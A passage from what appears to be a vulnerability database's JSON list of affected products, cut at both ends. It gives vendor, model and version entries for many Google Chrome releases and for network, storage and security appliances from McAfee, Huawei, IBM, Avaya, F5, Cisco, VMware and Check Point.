"chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "31.0.1650.60" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "20.0.1132.32" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "7.0.520.0" }, { "model": "network security sensor appliance", "scope": "eq", "trust": 0.3, "vendor": "mcafee", "version": "6.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "24.0.1312.35" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "4.1.249.1022" }, { "model": "next generation firewall", "scope": "eq", "trust": 0.3, "vendor": "mcafee", "version": "5.5.6" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "10.0.651.0" }, { "model": "big-iq device", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "4.3" }, { "model": "oceanstor s6800t v100r005c02", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "23.0.1271.31" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.835.109" }, { "model": "aura communication manager utility services sp", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.16.1.0.9.8" }, { "model": "secure access link gas", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.476.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.472.61" }, { "model": "network security manager", "scope": "eq", "trust": 0.3, "vendor": "mcafee", "version": "7.5.58" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "28.0.1500.44" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "3.0.195.37" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "19.0.1055.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "32.0.1670.1" }, { "model": "oceanstor s5600t v100r005c01", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.354.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "10.0.648.124" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "9.0.597.38" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "4.0.222.12" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "31.0.1650.33" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "11.0.690.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "12.0.742.75" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "17.0.963.42" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "9.0.597.73" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "9.0.597.64" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "9.0.570.0" }, { "model": "storwize", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v50007.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.472.22" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.347.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "16.0.912.13" }, { "model": "aura presence services", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "3.0.195.24" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "37.0.2062.90" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "35.0.1916.98" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "8.0.552.47" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "30.0.1599.44" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "27.0.1453.10" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "22.0.1229.11" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.412.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.44" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.835.27" }, { "model": "big-ip analytics", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.0.0" }, { "model": "vcloud connector", "scope": "eq", "trust": 0.3, "vendor": "vmware", "version": "2.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "10.0.634.1" }, { "model": "pureapplication system", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.0" }, { "model": "secureplatform r77.20", "scope": null, "trust": 0.3, "vendor": "checkpoint", "version": null }, { "model": "vsphere management assistant", "scope": "eq", "trust": 0.3, "vendor": "vmware", "version": "5.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.329.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "22.0.1229.1" }, { "model": "sdn for virtual environments", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.0" }, { "model": "network data loss prevention", "scope": "eq", "trust": 0.3, "vendor": "mcafee", "version": "9.2.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "19.0.1085.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "11.0.664.1" }, { "model": "gaia r75.40vs", "scope": null, "trust": 0.3, "vendor": "checkpoint", "version": null }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "32.0.1700.26" }, { "model": "big-ip apm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "34.0.1847.83" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "9.0.596.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.472.32" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "11.0.696.46" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.835.103" }, { "model": "espace cc v100r001", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "24.0.1312.53" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.835.113" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.375.47" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.375.69" }, { "model": "next generation firewall", "scope": "eq", "trust": 0.3, "vendor": "mcafee", "version": "5.7.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "12.0.730.0" }, { "model": "oceanstor s5500t v100r002c01", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "19.0.1060.0" }, { "model": "oceanstor s6800t v100r002c00", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "23.0.1271.40" }, { "model": "meeting exchange", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "10.0.610.0" }, { "model": "big-ip webaccelerator", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.422.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "11.0.696.48" }, { "model": "oceanstor cse v100r002c00lhwy01", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "27.0.1453.43" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "22.0.1229.24" }, { "model": "security access manager for mobile", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.0.4" }, { "model": "aura application server sip core pb28", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "53002.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "15.0.874.116" }, { "model": "cloud single sign on", "scope": "eq", "trust": 0.3, "vendor": "mcafee", "version": "4.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "4.0.299.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "33.0.1750.3" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.31" }, { "model": "server automation", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "10.02" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "19.0.1036.3" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "12.0.742.41" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "12.0.742.19" }, { "model": "big-ip link controller", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.00" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.371.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "32.0.1700.56" }, { "model": "secureplatform r75.45", "scope": null, "trust": 0.3, "vendor": "checkpoint", "version": null }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "32.0.1668.6" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "13.0.782.107" }, { "model": "vfabric postgres", "scope": "eq", "trust": 0.3, "vendor": "vmware", "version": "9.1.9" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "10.0.615.0" }, { "model": "telepresence system series", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "30000" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "9.0.599.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "18.0.1025.99" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "30.0.1599.51" }, { "model": "next generation firewall", "scope": "eq", "trust": 0.3, "vendor": "mcafee", "version": "5.5.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.452.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "27.0.1453.102" }, { "model": "ios-xe for catalyst 4k", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "17.0.963.12" }, { "model": "oceanstor hvs85t v100r001c00", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "websphere transformation extender", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.44" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "35.0.1916.92" }, { "model": "system networking san24b-5 2498-f24", "scope": null, "trust": 0.3, "vendor": "ibm", "version": null }, { "model": "workcentre", "scope": "eq", "trust": 0.3, "vendor": "xerox", "version": "75250" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "32.0.1675.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "16.0.912.30" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "11.0.696.50" }, { "model": "associates layer mobile access gateway", "scope": "eq", "trust": 0.3, "vendor": "computer", "version": "70" }, { "model": "telepresence ip gateway series", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "2.0.172.28" }, { "model": "oceanstor s5600t v100r001c00", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "15.0.873.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "4.0.301.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "27.0.1453.116" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.366.4" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.794.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "7.0.517.42" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "30.0.1599.40" }, { "model": "oceanstor s5600t v200r002c00", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "20.0.1132.35" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "13.0.781.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.375.60" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "37.0.2062.34" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "24.0.1298.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "2.0.157.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "34.0.1847.134" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.835.18" }, { "model": "secureplatform r70.1", "scope": null, "trust": 0.3, "vendor": "checkpoint", "version": null }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "12.0.742.72" }, { "model": "oceanstor v100r001c10", "scope": "eq", "trust": 0.3, "vendor": "huawei", "version": "9000" }, { "model": "secureplatform r71.40", "scope": "eq", "trust": 0.3, "vendor": "checkpoint", "version": "2.6" }, { "model": "power hmc r7.9.0", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.835.34" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "8.0.554.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "19.0.1084.45" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "13.0.775.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "12.0.742.59" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "19.0.1084.13" }, { "model": "security access manager for web", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.08.0.0.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "28.0.1500.36" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "20.0.1132.7" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "10.0.631.0" }, { "model": "ios-xe for asr903", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "network security manager", "scope": "eq", "trust": 0.3, "vendor": "mcafee", "version": "8.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.125" }, { "model": "move scheduler", "scope": "eq", "trust": 0.3, "vendor": "mcafee", "version": "2.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "27.0.1453.114" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.835.102" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.54" }, { "model": "ediscovery identification and collection", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.5.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.477.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "17.0.941.0" }, { "model": "scale out network attached storage", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.4.3.4" }, { "model": "secureplatform r75", "scope": "eq", "trust": 0.3, "vendor": "checkpoint", "version": "2.6" }, { "model": "linux", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.375.65" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.335.3" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "7.0.516.0" }, { "model": "qradar security information and event manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.2.6" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "11.0.696.35" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.430.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "32.0.1684.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.375.11" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "30.0.1599.37" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.457.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "24.0.1289.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "19.0.1084.48" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "18.0.1008.0" }, { "model": "junos space", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": "0" }, { "model": "esx", "scope": "eq", "trust": 0.3, "vendor": "vmware", "version": "4.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "35.0.1916.6" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "17.0.943.0" }, { "model": "aura communication manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "28.0.1500.21" }, { "model": "web gateway", "scope": "eq", "trust": 0.3, "vendor": "mcafee", "version": "7.4.2" }, { "model": "aura session manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1.3" }, { "model": "aura session manager sp2", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "10.0.609.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "12.0.742.114" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364160" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "4.0.211.0" }, { "model": "ios-xe for isr4400", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "18.0.1025.42" }, { "model": "t5565 thin client hp t5565z smart client", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "0" }, { "model": "nvp", "scope": "eq", "trust": 0.3, "vendor": "vmware", "version": "3.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.342.4" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "9.0.582.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "16.0.912.63" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "9.0.589.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "17.0.963.41" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "26.0.1410.43" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "31.0.1650.4" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "30.0.1599.90" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "9.0.575.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "32.0.1671.8" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "32.0.1663.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "22.0.1229.26" }, { "model": "big-ip gtm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.2.1" }, { "model": "media experience engine", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "message networking sp3", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.356.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "29.0.1547.33" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "24.0.1280.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "13.0.782.84" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "24.0.1312.21" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "19.0.1084.30" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.122" }, { "model": "3722-s52", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "17.0.963.39" }, { "model": "vcenter orchestrator appliance", "scope": "eq", "trust": 0.3, "vendor": "vmware", "version": "4.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "23.0.1271.37" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.375.95" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.375.57" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "32.0.1700.74" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "11.0.696.61" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "12.0.726.0" }, { "model": "websphere transformation extender", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.42" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "33.0.1750.5" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.375.84" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "11.0.667.3" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.835.117" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "19.0.1034.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "17.0.963.81" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "1.0.154.36" }, { "model": "algo risk service on cloud", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "0" }, { "model": "oceanstor s5800t v200r002c20", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "gaia embedded r71.30", "scope": null, "trust": 0.3, "vendor": "checkpoint", "version": null }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "15.0.874.22" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "18.0.1025.112" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "3.0.195.32" }, { "model": "iq", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.1.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "12.0.716.0" }, { "model": "storwize", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v35006.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.480.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.466.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "15.0.874.45" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "12.0.700.0" }, { "model": "associates application performance management cloud monitor", "scope": "eq", "trust": 0.3, "vendor": "computer", "version": "0" }, { "model": "oceanstor s5600t v100r001c01", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "high-density server dh310 v100r001c00", "scope": "eq", "trust": 0.3, "vendor": "huawei", "version": "v2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "7.0.517.28" }, { "model": "aura system platform", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0.3.9.3" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "32.0.1684.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "27.0.1453.5" }, { "model": "oceanstor s6800t v100r002c01", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "high-density server dh628 v100r001c00", "scope": "eq", "trust": 0.3, "vendor": "huawei", "version": "v2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.466.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "30.0.1599.14" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "24.0.1312.48" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "12.0.742.82" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "11.0.696.21" }, { "model": "security access manager for web", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0.0.7" }, { "model": "oceanstor s5800t v200r002c10", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "security access manager for web", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0.0.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "32.0.1652.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "7.0.517.6" }, { "model": "aura communication manager utility services", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "13.0.782.24" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "28.0.1500.68" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "10.0.627.0" }, { "model": "network convergence system series routers", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "60005.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.466.4" }, { "model": "gaia r75.10", "scope": null, "trust": 0.3, "vendor": "checkpoint", "version": null }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "24.0.1312.28" }, { "model": "firewall enterprise control center", "scope": "eq", "trust": 0.3, "vendor": "mcafee", "version": "5.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "8.0.552.19" }, { "model": "e9000 chassis v100r001c00", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "session border controller", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "37.0.2062.69" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.826.0" }, { "model": "oceanstor hdp3500e v100r002c00", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "9.0.597.47" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "9.0.581.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "20.0.1132.1" }, { "model": "secure access link", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "1.5" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "7.0.544.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "10.0.648.130" }, { "model": "ipso r77", "scope": "eq", "trust": 0.3, "vendor": "checkpoint", "version": "6.2" }, { "model": "cloudsystem foundation", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "8.1" }, { "model": "ip office application server sp", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "9.01" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "4.1.249.1041" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "28.0.1500.42" }, { "model": "mds", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "90000" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.336.0" }, { "model": "storeever esl g3 tape library 665h gs12501", "scope": null, "trust": 0.3, "vendor": "hp", "version": null }, { "model": "vcenter server appliance", "scope": "eq", "trust": 0.3, "vendor": "vmware", "version": "5.1" }, { "model": "associates layer api gateway", "scope": "eq", "trust": 0.3, "vendor": "computer", "version": "70" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "12.0.742.11" }, { "model": "chrome", "scope": 